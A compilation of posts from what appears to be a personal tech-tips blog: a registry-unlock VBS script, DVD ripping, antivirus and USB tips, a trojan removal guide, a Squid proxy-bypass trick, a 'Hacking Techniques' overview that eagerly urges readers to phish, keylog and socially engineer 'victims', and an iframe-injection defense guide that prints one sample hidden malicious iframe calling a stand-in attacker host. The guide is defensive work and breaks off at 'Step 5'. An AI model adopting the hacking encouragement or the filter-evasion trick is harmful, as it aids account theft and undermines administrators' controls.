How to Open Locked Regsitry


Trick to Open locked registry

I got this trick from nebulla

Registry is the vital component on Windows OS. It has many values stored on it, which each value gives unique function of your system. Some viruses also try to add some values which can make your system unstable and lock the registry. Many tools available to "communicate" with this component. But you can simply make private tool to make some "communications" when your registry has been locked. Try this code. You can paste it into notepad editor.


<======start point=======>
'Enable/Disable Registry Editing tools
'© Doug Knox - rev 12/06/99

Option Explicit

'Declare variables
Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers
Dim enab, disab, jobfunc, itemtype

Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKCU\Software\ Microsoft\ Windows\CurrentV ersion\Policies\ System\"
p = p & "DisableRegistryToo ls"
itemtype = "REG_DWORD"
mustboot = "Log off and back on, or restart your pc to" & vbCR & "effect the changes"
enab = "ENABLED"
disab = "DISABLED"
jobfunc = "Registry Editing Tools are now "

'This section tries to read the registry key value. If not present an
'error is generated. Normal error return should be 0 if value is
'present
t = "Confirmation"
Err.Clear
On Error Resume Next
n = WSHShell.RegRead (p)
On Error Goto 0
errnum = Err.Number

if errnum <> 0 then
'Create the registry key value for DisableRegistryTool s with value 0
WSHShell.RegWrite p, 0, itemtype
End If

'If the key is present, or was created, it is toggled
'Confirmations can be disabled by commenting out
'the two MyBox lines below

If n = 0 Then
n = 1
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
ElseIf n = 1 then
n = 0
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox(jobfunc & enab & vbCR & mustboot, 4096, t)
End If
<======End point======>

Save as regtools.vbs. To execute it, you just to double click it.
I hope useful for you... Don't forget to leave your comments

How to Rip & Shrink a FULL DVD movie, Backup a DVD, DVD Shrink, DVD Decrypter, Tutorial


Written by:
Mike Ly


What does more than 4.7GB in size mean?
GB is a measure of capacity. 1 GB means 1 Gigabyte, which is also equal to 1,024 MB (Megabyte). Most of the recent DVD Movies are more than 4.7GB in size, old movies are usually smaller than 4.7GB. Reason being is that most of them now have special features, specials, multiple languages and more that take a lot more space. Most of the ripping programs refer the capacity of the DVD Movie using Megabytes. Lets start.

  1. Hardware needed:
    • DVD Burner
    • DVD-ROM (Optional - for ripping only)
  2. FREE Programs (discontinued) are Needed:
    • DVD Shrink - (download here: DVD Shrink Download)
    • DVD Decrypter - (download here: DVD Decrypter Download)
Here are the steps to backup a whole dvd (i.e. movie, movies, including special features) that is more than 4.7GB in size, else go to dvd's less than or equal to 4.7GB Tutorial
Ripping with DVD Shrink
  1. Open DVD Shrink
  2. Click "Open Disk"
  3. Select your DVD-ROM/Burner where your movie is located, this will load the movie and have DVD Shrink take a couple minutes to analyze.
  4. Under "Full Disk Backup" select "Menu", then under "Video"'s drop down menu, selecet "Custom Ratio".
  5. Move the slider all the way to the left to shrink it.
  6. Select the "Extras" and do the same thing as step 4 & 5, do this for ever single "Extras".
  7. If there are any "Unreferenced Material", do the same thing as step 4 & 5.
  8. Click "Full Disc" square button, at the "Back Up" DVD Screen, select "ISO Image", the "select target image file" is the location and the iso name.
  9. "Encoding" will start, which typically can take up considerable time, depending on your computer hardware.
  10. "Back Up Complete" when its done creating the ISO, reminding of you where the location of the ISO file is located.

Burning the ISO with DVD Decrypter:
  1. Start DVD Decrypter and let it load
  2. Select Mode > ISO > Write
  3. Select your DVD Burner in the "Destination"
  4. Under "Source", select the ISO file created by DVD Shrink in step I
  5. Click on the big Write Button that has the picture of the "hard drive, green arrow, and dvd" under the "Destination" box
  6. This will start the burning
  7. That's it!

9 Steps To Protect Your System from Viruses


Nowadays as the Internet and other networks are greatly developed computer viruses are distributed rapidly and intensively. Everyday several new viruses capable to damage considerably your computer system arise. Anti-virus specialists work hardly to make updates their software against new viruses as soon as possible. The viruses can get inside computer in different ways. That is why there is no simple method to protect system. Only series of measures can give you reliable protection from the infection. Below are 9 steps to protect MS Windows based PC system from viruses.
  1. Make regular backups. It should be said that there is no absolutely safe way of protection. Virus creators regularly find holes in new computer products to use them for infection of computer systems. Some dangerous viruses can considerably damage data files or even erase entire file system. Make regular backups of your data files to separate file storage device. It can be separate hard drive, flash card, compact disc or another file storage device which you choose. To ease the procedure you can use some automatic backup software. And be ready if the system will die because of virus infection.
  2. Be ready to reinstall your system if it dies because of viruses. Get distributives of your operation system and distributives of software which you use and keep them together, for instance, on a set of CDs not far away from you. In this case if virus infection will cause unrecoverable system failure you can rapidly reinstall your working medium.
  3. Protect your network connection with Firewall. Firewall is a software which blocks suspicious potentially dangerous connections to preventing viruses from network to penetrate into your system. Windows XP system has quit simple but reliable built-in firewall. You can enable it as follows. 1) in Control Panel, double-click Networking and Internet Connections, and then click Network Connections. 2) Right-click the connection on which you would like to enable firewall, and then click Properties. 3) On the Advanced tab, check the option to Protect my computer and network.
  4. Use antivirus software. Install antivirus software which will scan your system searching and erasing viruses on a regular basis. Leaders in antivirus software products for Windows systems are Norton Antivirus, McAfee, Kaspersky Anti-Virus and PC-cilin.
  5. Regularly update operating system. Windows XP has built-in automatic update service. It regularly contacts Microsoft server to find updates and notifies you if updates are ready to be installed. Updates are important because hackers regularly find holes in operating system which are often used by virus creators.
  6. Don't install and don't run suspicious software. Check new programs which you are going to install with anti-virus software. Don't download software from suspicious websites. To download software always seek website of software creator or official distributor. Do not open applications received by email from unknown persons.
  7. Limit access to your computer. Protect enter to system with password.
  8. If you use Internet Explorer, consider moving to another browser. As IE is the most distributed browser today virus creators actively use defects in its security system to infect computers. Infection may arise if you will visit webpage which contains invisible harmful code. You are more safe if you use less known browser only because virus creators do not pay much attention to it. Major IE competitors Firefox and Opera browsers provide now the same comfortable interface and range of services for working on the Web.
  9. Use spam protection. Viruses are often distributed via email. Switch on spam filters in your email box to block spam receiving. If you need assistance with using of the filters you can ask your email service provider.
That's all from me. Hope will be useful for you

Lock Your USB Flashdisk Port


Trick to block your USB flashdisk

USB Flashdisk is the most applicable mobile storage to save our data. We can save anything to it, and open anything from it by plugging it in the USB port. But sometimes USB flashdisk became the "way" of some viruses to spread itself. Viruses make an autorun program to automatic inject your system when USB flashdisk is connected. You can easily prevent this accident by doing a simple trick, to make your computer doesn't accept USB flashdisk. The steps are as follow:
  1. Click Start, and then click Run or you can use Windows hotkey by pressing Windows button-R together.
  2. In the Open box, type regedit, and then click OK.
  3. Locate, and then click the following registry key: HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\UsbStor.
  4. In the right pane, double-click the value named Start.
  5. In the Value data box, type 4 (the default value is 3) and click Hexadecimal radio button(if it is not already selected), and then click OK.
  6. Don't forget to refresh the registry by pressing F5.
  7. Quit Registry Editor.
That's all the trick to prevent any USB flashdisk read by your computer. I hope usefull for you...
Give your comment to make my article better than ever...

trojan.win32.vb.kcd



Trick to remove trojan.win32.vb.kcd

The name was trojan.win32.vb.kcd. It has been made using VB 6.0. Some effects resulted of this virus are move all of your original .doc and .xls file to the C:\Windows\system32\MB and replace them with the file as your original file name but have the .exe extension.
Step by step to remove it is as follow:
  1. Remove file C:\Windows\system32\MB\WORD.scr
  2. Hit the (Win Button+R) and type regedit.exe to go to the registry editor
  3. Point to the "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" see the right side on the value named WORD.scr
  4. Terminate process named rstrui.exe through task manager. You can right click on the taskbar and select Task Manager
  5. Remove file C:\Windows\system32\MB\rstrui.exe
  6. Find the file which have extension .exe and 140 KB on capacity. That file have the Word icon. Remember to find the file that have hidden attribute by check the "find the hidden file" radio button on search criteria
  7. If the file found, you should to delete them.
That's all the ways to eliminate the virus manually without any antivirus software. May it useful for you.

Thnks to Ahmad Syahruddin

Portable Spyware Terminator


Posted from D3vill

This spyware scanner and removal tool does the job, but enabling some functions may cause slight slowdowns and it's not ready for Vista. Spyware Terminator's crisp, clean interface uses simple buttons and tabs to operate and set options. The latest spyware signatures are automatically downloaded, and the real-time protection keeps baby-sitting to a minimum. Real-time protection monitors key spyware types and Windows objects, though slight system slowdowns depend on your machine. Those features and the simple scheduler will make this app appealing to novices.Advanced users will appreciate Spyware Terminator's flexibility. Setting the sensitivity of various scans is as easy as moving a slider. Experienced users will want to enable the built-in antivirus tool, which extends the power of real-time analysis by comparing program code against a database of known viruses, Trojans, and worms.


From set-it-and-forget-it users to those delving into virus code, all will find Spyware Terminator flexible,
simple, and effective, key measures of a good antispyware tool.

Program Highlights:
• Effectively Protects Your Computer from Spyware
• Safely Store Quarantine Detected Spyware
• Easy to Use, Easy to Setup
• Manual & Scheduled Scans Keep Your Computer Spyware-Free
• Automatically Download Updates that Keep Spyware Terminator Current

Basic Program Features:
• Free 100% Real-Time Protection is included in Spyware Terminator basic version - an essential function most other applications charge you extra for. Effectively remove spyware, adware, trojans, keyloggers, home page hijackers and other malware threats.
• Safe Quarantine. Suspect files found during the scan are moved into Quarantine. Spyware Terminator prevents them from functioning and causing further damage to your computer. You can review and choose to permanently remove suspect files or safely store essential files.
• Easy to Use. Spyware Terminator lets people of all skill levels detect and eliminate spyware. If you remove a program by mistake, you can easily put it back.
• Manual & Scheduled Scan. Scan your computer manually or schedule an in-depth scan to be performed on a regular basis. The scan process runs in the background so that you will not be disrupted while working on other tasks.
• Automatic Update Downloads. Spyware Terminator can be set to automatically download updates, ensuring the most effective protection for your computer.
• Effective Spyware Protection
Spyware Terminator prevents spyware from infecting your computer.
• Free 100% Real-Time Protection
Guards your system and ensures spyware is intercepted before it installs.
• Antivirus Protection Included
Extended detection of malware during scans and within the Real-Time Shield.
• Safe Internet Browsing and Search
Web Security Guard displays websites' reviews and threat level to help prevent users from entering potentially dangerous websites.
• Now Free for Both Personal and Commercial Use
Spyware Terminator is now available free for both home and business use.

Download Link
http://uploading.com/files/EPS5OITJ/Spyware.Terminator.2.5.8.145.Portable.rar.html

How Long to Load?


Would you like to know how long your computer load a webpage? Now, you can use this program to measure the time for you. Its name is StopWatch, you can access them by clicking here!. Enter the URL to be measured and you should watch the top of the window.
The StopWatch can only measure websites that can be displayed in a frame. Some websites use javascript to break out of frames. Be calm please, this is not a StopWatch bug.

Unblocked Proxy


Have you an experience about blocked proxy by administrator? absolutely, you will be very disturbed. OK, I will share trick to bypass system restriction from a proxy. This test have been done under proxy squid 2.5 stable 10 and got success. not yet tested to proxy server outside of squid.
The example we use was rapidshare.

the blocked picture is as follow:
unavailable
And the success picture is as follow, we just inserted a simple command to open rapidshare.
success
The trick above can be done to download file too, e.g. http://thecybergal/takefile.zip. On this portion, the file will be blocked by proxy. But you can still download your file by embedding a little command "?gmail.com" (without quote) in the end of the address. So, the complete address will be seen like this "http://thecybergal/takefile.zip?gmail.com". Finally, the download progress will be seen...

The link above just an example. Does this trick work properly? I hope your Admin didn't yet read this article.

Thanks to:
ilham2930
Original source : xtremenitro

Make Firefox Faster


This trick has been posted on yogyafree forum by "DEL_CAESAR". I just repost it and share to you. Ok, let's get it done.
  1. type "about:config" (without quote) on the address bar, scroll down and point to the entries bellow:

    network.http.pipelining
    network.http.proxy.pipelining
    ntwork.http.pipelining.maxrequest

    normally, the browser will make a request for a web page in once time. when you enable pipelining, some pages will be requested in once time and exactly will make the page loading better.
  2. Click "[+/-] Read More" Please
  3. change the entries bellow:

    set "network.http.pipelining. => "true"
    set "network.http.proxy.pipelining => "true"
    set "network.http.pipelining.maxrequest => "whatever you want, e.g. 30". this mean there are 30 request in once time.
  4. the last, right-click wherever you want, select New->Integer. give "nglayout.initialpaint.delay" on preference name, and set the value to "0".

that's all, may usefull rof you...

Important Fact About Trojan Viruses


Rom casual computers to those who spend hours on the Web, knowing the facts about Trojan viruses is a must. If you store personal info on your PC, learning to protect yourself from these programs is necessary.

Definition

Technically, these aren't viruses. These are actually programs / software. However their actions and purpose are the same as viruses. For average computer users, the definition isn't as important as knowing how to spot and eliminate them.

What the Viruses Can Do

Their activities are often called payloads or attacks. These are classified into different types. Remote attacks go after FTP or HTTP servers. They can interrupt downloading of files. These viruses can also interfere with server requests and other processes. These Trojan viruses can also hack into proxy servers.


Payloads aren't limited to networks. Once active they can destroy files on hard disks. Others will attack the boot system. Once this happens the PC won't be able to boot up. Others are able to get personal information and passwords. These are relayed to various sites via HTTP.

The Way the Virus Works

It's impossible to give a standard process. These are created by different programmers. They do share common characteristics though. The most important is that they operate in secret. Most of the time, users won't know it's been activated. Only when the Trojan viruses are doing their damage will it be apparent.

How the Viruses Get in a PC

One way is by downloading. A user downloads a game or other software. He or she is unaware that the virus is included in the software. When the game is run, the virus is installed with it.

Another way is through email. The virus is attached to the email. The user unknowingly opens it, infecting the computer. Often, the attachment is passed on to other users. The scenario repeats itself, and that's how it spreads.

Not to be discounted are pirate software. These come in DVD / CD or downloaded from the Web. Both sources are filled with Trojan viruses and other malware.

Protecting Yourself

Get an antivirus application. Install it and download the updates regularly. Run a virus scan whenever you download software. Never turn it off when you are online. Run a full virus scan at least every week. An anti spyware program will also help. Use it in conjunction with your antivirus software.

Always back up your documents. It should be done weekly at the very least. If your system is infected, run the virus scanner first. Don't back them up until your computer has been cleared.

Never open an email attachment without scanning it. Don't just rely on the email service scanner. Run one yourself. Needless to say, you should never use pirated software. Never install Active X or Java applets from suspicious looking websites.

Always read up on the latest news about Trojan viruses. You can never be too careful when it comes to your files. Take all the necessary precautionary steps as suggested. This will keep your data safe.

The Computer Acronyms


Got from rocktuts

You Have to know aboout these computer Acronyms

Let's see !
ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft /min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ADSL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

Kbps - Kilobits Per Second
KBps - KiloBytes per second

LG - LG Electronics
LAN - Local Are Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

MAC - Media Access Control
MB - MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

VCD - Video CD
VPN - Virtual Private Network

WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology

What is Spy-Ware?


Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer them to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee.


The most of spyware is Adware. The main purpose of an adware program is to capture "anonymous" data for targeted advertising. Adware is usually just an annoyance, but sometimes it can cause greater difficulties.

The less common spyware programs is called Malware. Malware is a program that designed to cause problems with computer. Malware include viruses, Trojan horse programs, and certain forms of hijacking spyware. These types of spyware are written to get personal information such as email passwords, internet banking passwords, credit card numbers, and social security numbers for fraud. Many of spyware can change default program settings to allow an attacker access to the computer, or monitor a user's keystrokes to get information. The information is then sent off to the attacker via email without user knowledge or intervention.

There are thousands out there, new ones are added to the list everyday. But here are a few:
Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

Hacking Techniques


Adopted from Hacker Hubz

So, Its time now that we should know what are various categories hacking fall into. I will try to focus on the ones based on password hacking. There is no distinct classification of hacking.. but i will list all i could remember..
So, as you all would have guessed this will not be a practical application.. I will give tutorials on all of them in coming posts.. but its the most important thing to have basic knowledge about all the techniques available.. So, consider going through the post once..
Common Methods for Hacking Computer Terminals(Servers): This comprises of either taking control over terminal(or Server) or render it useless or to crash it.. following methods are used from a long time and are still used..


1. Denial of Service - DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic(which can be e-mail or Transmission Control Protocol, TCP, packets).
2. Distributed DoSs - Distributed DoSs (DDoSs) are coordinated DoS attacks from multiple sources. A DDoS is more difficult to block because it uses multiple, changing, source IP addresses.
3. Sniffing - Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.
4. Spoofing - Spoofing is the act of sending an illegitimate packet with an expected acknowledgment (ACK), which a hacker can guess, predict, or obtain by snooping
5. SQL injection - SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. It uses normal SQL commands to get into database with elivated privellages..
6. Viruses and Worms - Viruses and worms are self-replicating programs or code fragments that attach themselves to other programs (viruses) or machines (worms). Both viruses and worms attempt to shut down networks by flooding them with massive amounts of bogus traffic, usually through e-mail.
7. Back Doors - Hackers can gain access to a network by exploiting back doors administrative shortcuts, configuration errors, easily deciphered passwords, and unsecured dial-ups. With the aid of computerized searchers (bots), hackers can probably find any weakness in the network.
So, not interested in these stuffs.. huh??? wait there is more for you.. So, how about the one related to hacking the passwords of email and doing some more exciting stuffs.. The various methods employed for this are:
8. Trojan Horses - Trojan horses, which are attached to other programs, are the leading cause of all break-ins. When a user downloads and activates a Trojan horse, the software can take the full control over the system and you can remotely control the whole system.. great..!!! They are also reffered as RATs(Remote Administration tools)
9. Keyloggers - Consider the situation, everything you type in the system is mailed to the hacker..!! Wouldn't it be easy to track your password from that.. Keyloggers perform similar functionallities.. So next time you type anything.. Beware..!! Have already posted about keyloggers and ways to protect yourself from them..
10. BruteForcing - The longest and most tiring job.. don't even consider this if you don't know the SET of password for your victim..
11. Secret Question - According to a survey done by security companies, it is found that rather than helping the legitimate users the security questions are more useful to the hackers.. So if you know the victim well try this..
12. Social Engineering - Ya this was one of the oldest trick to hack.. Try to convince your user that you are a legitimate person from the system and needs your password for the continuation of the service or some maintainence.. This won't work now since most of the users are now aware about the Scam.. But this Social Engginering concept is must for you to have to convince victim for many reasons..!!!
13. Phishing - This is another type of keylogging, here you have to bring the user to a webpage created by you resembling the legitimate one and get him to enter his password, to get the same in your mail box..!! Use social engginering..
14. Fake Messengers - So its a form of phishing in the application format.. getting user, to enter the login info in the software and check your maill..!!!
15. Cookie Stealer - Here the cookie saved by the sites are taken and decoded and if you get lucky.. You have the password..!!!
Hmmm.. not satisfied with single account at a time..?? so there are ways to hack lots of accounts together.. I know few but there exists many..!! listed are the ones i know and will teach you in coming posts...
16. DNS Poisoning or PHARMING - So, phisihing is a tough job.. isn't it..?? convincing someone to enter their password at your page..?? what if you don't have to convince..?? what if they are directed automatically to your site without having a clue..?? Nice huh..?? Pharming does the same for you.. More about it in my next post..
17. Whaling - This method gets you the password of the accounts which are used by the hackers to recive the passwords.. So you just have to hack one ID, which is simplest method( Easy then hacking any other account, will tell you how in coming posts..) and you will have loads of passwords and so loads of accounts at your mercy..!!!

Measures to Prevent and Detect iFrame Injection Attack


Behalf on Joseph Schembri

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. The following is an example of a malicious iframe injection code:

iframe src="http://www.example-hacker-site.com/inject/?s=some parameters" width="1" height="1" style="visibility: hidden" /iframe

The iframe tag is an HTML tag used to seamlessly embed content from another page or site. (The "i" in "iframe" stands for "invisible", i.e. "invisible frame".) IFrames are used on thousands and thousands of sites, because that's what Google uses for its AdSense ads - the little bit of JavaScript you paste on your page eventually ends up inserting an iframe into the HTML of your page.

Like most useful things, iFrames can be used for good or for bad.

An iframe injection is an injection of one or more iframe tags into a page's content. The iframe typically does something bad, such as downloading an executable application that contains a virus or worm in it... something that compromises a visitor's system.

Typically, all your index.* files in your server are infected with a piece of code that loads a hidden iframe in the page. Examples of these pages are:

index.htm
index.html
index.shtml
index.php

The intent of this article is to show what preventative measures you can use to prevent or detect iframe injection attacks to your website.

STEP 1

The first thing you need to do is to check with Google to see if your site is listed as suspicious. You can do this by using the following link:

http://www.google.com/safebrowsing/diagnostic?site=http://yourdomain_name

Before you use the link, you need to replace "yourdomain_name" with your actual website name.

Google will tell you if your website is suspicious or not.

You can also go to the following website and enter your "www.yourdomain_name". It will advise you on your websitestatus.

http://www.unmaskparasites.com/

STEP 2

If you have suffered an iframe injection attack you need to act fast. If the security of your website is compromised, it can affect the search engine rankings of your website. Besides, it may pave way for more sophisticated attacks. Google will mark your site in it's search results with a warning: "This site may harm your computer". If a visitor sees the message "This site may harm your computer" pop up when (s)he try to access your website/blog, (s)he may not return again and your traffic will go down to zero.

I suggest that you read the article "Website Protection Against iFrame Injections" which you can find at:

http://websiteprotection.blogspot.com/

and also visit:

http://www.websiteprotection.net

Step 3

If you have not suffered an iframe injection attack, then you can manually run some scripts which will test the index.* files on your website.

One script you can use is called "clean.php" which you can download at:

http://www.diovo.com/wp-content/uploads/2009/04/clean.php.txt

Copy and paste this script into your text editor, such as notepad, and save the file as "clean.php"

It is important to remember that when you create a web page, it is important to use a pure text editor such as Notepad or an editor designed to create web pages. Never use Word or a word processor to create web pages. The files that word processors create contain formatting codes and other invisible information that can create problems with web servers. Also, when you save the web page, ensure that it has the proper file extension, e.g., index.html, clean.php, etc.

Before you can use the file, you need to change the following line in the script:

$webpath ="Type your domain name here. Eg:http://www.diovo.com/"

which will become:

$webpath ="http://www.yourdomain_name/

Where "yourdomain_name" is replaced with your actual domain name.

In the script, the "s" parameter specifies the file name to search for and the "c" parameter specifies the text to search for inside the file.

When you have pasted the above script into your notepad editor, made the change for your website name, save it as "clean.php". Once you have saved the file, upload it to the root directory of your website.

Now you need to create a URL that you will copy and paste into your browser as follows:

http://www.yourdomain_name/clean.php?s=index.php&c=iframe

where "yourdomain_name" is replaced by your actual doamin name.

The web page to be checked is given by "s=index.php" and the text to be found is "c=iframe". This will scan all your files and folders on your website for index.php injections.

Since we also want to check our index.html type web pages, we create a different URL as follows:

http://www.yourdomain_name/clean.php?s=index.html&c=iframe

The file to be checked is given by "s=index.html" and the text to be found is "c=iframe". This will scan all your files and folders on your website for index.html injections.

The URL will list all the "index.php" or "index.html" files in your website and if any of the files contains the given string, it will print the part with the string. You can see that one file is infected by displaying the iframe script.

Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So you will have to clean the files manually by deleting the iframe script.

You should be able to see that you can use the "s" parameter to test any web page on your website for iframe injection. Simply put in the exact webpage as follows:

s=webpage.ext

You can thus create simple internet URL shortcuts that you can click on to check the required web pages.

When the script tests for iframe injections, it is basically looking for the text "iframe" and so will display any web page that has the text "iframe". You need to ensure that the iframe being displayed is actually a malicious iframe, similar to the example shown previously. Sometimes it may be a legitimate iframe. Be absolutely sure before you delete it from your web page.

The "clean.php" iframe injection tool is quite useful when testing individual pages. However, after your website starts to grow, you will need to have a URL link for every web page extension (ext) which starts to be a time consuming effort, having to check each individual web page for iframe injection.

A website that gives a free script to test all the files on a website for iframe injection is given at the following link:

http://www.websanity.co.uk/blog/2009/08/scan-website-files-for-iframe-injection.html

The file is called "detect-signature.php"

When you have dowloaded the file, there are a couple of lines in the script that I suggest you change. This will help make the script more suitable for your website.

Using your notepad editor, open the file. First locate the following line:

define('IGNORE_EXTENSIONS',"jpg pdf zip psd doc gif swf xls"); // Ignore files of these types

You will see that the file will ignore files with extensions jpg, pdf, zip, etc. You can add or delete files as you feel necessary.

Next, locate the following line:

define("IGNORE_BEFORE", strtotime('2009-08-01') );

The file will ignore any web pages created before August 1, 2009. You may want to change this to ensure all your website files are tested. You could simply change 2009 to 2008.

You will be downloading the "detect-signature.php" as a zip file. After download, extract the file. Using the notepad editor, open the file and change the suggested lines to what suits your needs and re-save. Upload the file to the root directory of your website.

To activate, you need to create the following URL for your domain:

http://www.yourdomain_name/detect-signature.php

You can either create a URL short cut or else copy and paste the URL into your browser. Put in your exact domain name for "yourdomain_name".

When the file is activated, it initially starts by checking every file and web page on your website, unless you have excluded it.

Once the scan is complete, you have two more options you can use for scanning for iframe injection. You can either have the scan stop at the first error (iframe injection) or have it display all errors (all files and web pages with iframe injection). You can continuously click on any of the three links on the web page scan results.

When you do find iframe injections, you need to evaluate if the iframe injection is of the malicious form as indicated previously. If it is, you need to remove it from your web page. Open up your web page with a notepad editor if you have entered your site via FTP, find the iframe injection, delete it and re-save your web page. If you have a complete up-to-date backup of your web page, you can just upload it to your website. It will over-write the web page with the iframe injection.

What I like about this file is that it can check every web page on your website. Although the primary intent is to check all the index.* web pages, checking your other web pages is an added benifit as they might also be attacked. Just make sure that when ever you do find an iframe injection, it is really a malicious iframe.

Step 4

Having the ability to manually check for iframe injections goes a long way in helping keep your website secure. The final step now is to automate the iframe scanning in case you forget. This will be your constant watch dog.

The best way to do this is to schedule the iframe scanning, say every hour. A nice free System Scheduler can be found at:

http://www.splinterware.com/download/index.htm

Once you have downloaded the System Scheduler, install it. We will schedule the file "detect-signature.php" on your website to run a scan every hour.

As mentioned previously, there are three ways to run the file. We can check and display all files, check and display only errors, or, check and display errors only. The error is the iframe injection. We will use the 3rd option so we will need to use the following URL in the System Scheduler:

http://www.yourdomain_name/detect-signature.php?display_errors_only

When the file runs, it will show any iframe infected files. If you see errors, you need to take immediate action.

We will now schedule the file. Open System Sceduler. Select the "Action" menu and then select "New Event", You should now be in the Event dialog box. For Event type you can leave "Run Application". Give the event a title such as "iFrame Injection Scan". In the Application box, input the complete URL to display errors only, with your actual domain name. In "Working Dir" put any directory on your computer. In "State" box, select Maximized.

We now need to scedule when we want to run the scan. Select the "Scedule" tab. For "Scedule Type, select "Every Hour / Selected Minutes". In the left bottom boxes, select "Every Hour" and "On The Hour". This means the scan will run, e.g. at 1:00 pm, 2:00 pm, 3:00 pm, etc., for the daily 24 hour time frame. Now go to "Action" menu and Save and Exit. You should see the System Schedule icon in your right bottom tool bar. This icon must always be displayed in order for the event to run.

Every hour on the hour, your web page will be activated and your website scanned for iframe injections. Look over the results and take action if necessary, otherwise close the web page. If you do not close the page, you will see multiple web pages of the same thing. You simply need to look them over and close them. If you are running the scan constantly over night, you will see the multiple web pages in the morning.

You do not have to run every hour on the hour. You can select what ever time schedule you prefer. If you have been attacked, I strongly recommend you stay with hourly scanning.

To help things be a bit clearer, I added the date and time in the "detect-signature.php" file so that I knew the exact date and time the scan was made. You can search the internet for java script that you can add. It is very easy to do and will give order to your scanning.

Step 5

